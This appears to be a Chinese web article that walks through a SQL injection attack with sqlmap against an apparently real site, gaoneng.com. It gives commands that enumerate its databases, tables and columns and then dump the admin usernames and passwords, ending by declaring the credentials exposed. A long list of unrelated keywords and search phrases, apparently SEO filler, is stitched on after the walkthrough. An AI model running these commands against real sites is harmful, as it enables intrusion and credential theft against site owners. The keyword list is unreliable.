sqlmap的使用
发表于:2024-12-13 作者:千家信息网编辑
千家信息网最后更新 2024年12月13日,用sqlmap进行注入1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。sqlamp.py -u "http://www.gaoneng.com/product.php?cid=71"可以看出此
千家信息网最后更新 2024年12月13日sqlmap的使用
用sqlmap进行注入
1、用扫描工具可以扫出注入点这里我用一个注入点进行说明。
sqlamp.py -u "http://www.gaoneng.com/product.php?cid=71"
可以看出此处存在sql注入漏洞。
2、
sqlmap.py -u "http://www.gaoneng.com/product.php?cid=71"
--dbs 可以跑出存在的数据库名
然后可以跑gaoneng数据库中的表
Sqlmap.py -u"http://www.gaoneng.com/product.php?cid=71" -D gaoneng --tables
既然已经爆出数据库里的表,那就可以爆出表中的字段
Sqlmap.py -u "http://www.gaoneng.com/product.php?cid=71"
-D gaoneng -T com_admin --columns
可以看到这个表中存在我们需要的字段,密码与用户名
Sqlmap.py -u "http://www.gaoneng.com/product.php?cid=71"
-D gaoneng -T com_admin -C username,password --dump
由此这个网站的管理员密码与用户名已被完全爆出。
数据
数据库
字段
密码
用户
用户名
工具
扫描工具
漏洞
由此
管理员
网站
管理
数据库的安全要保护哪些东西
数据库安全各自的含义是什么
生产安全数据库录入
数据库的安全性及管理
数据库安全策略包含哪些
海淀数据库安全审计系统
建立农村房屋安全信息数据库
易用的数据库客户端支持安全管理
连接数据库失败ssl安全错误
数据库的锁怎样保障安全
数据库是软件开发的核心吗
网络安全侠客
中国软件开发人员输出国外
网络安全论坛图片
mc服务器好听的名称
瑞丽服务器显卡
分布式网络安全系统的分析与设计
数据库应用举例子
能在线编辑的服务器
校园网络安全使用调查问卷
生物恐怖因子数据库
辽宁数据网络技术服务工程
怀旧服有好看的服务器吗
软件开发绩效可以拿多少奖金
中成药数据库
为什么链接数据库链接不上
海南省网络安全部
襄垣租房软件开发
接入层网络技术类型
上海夏宁互联网科技有限公司
互联网时代的技术科技论文
潮汕专业软件开发定做
58同城珠海软件开发培训班
防爆刀片服务器厂家直销
保证局域网网络安全
怎么跟数据库交互
数据库性别数据类型怎么写
闵行区品牌网络技术来电咨询
数据库效率软件
服务器os
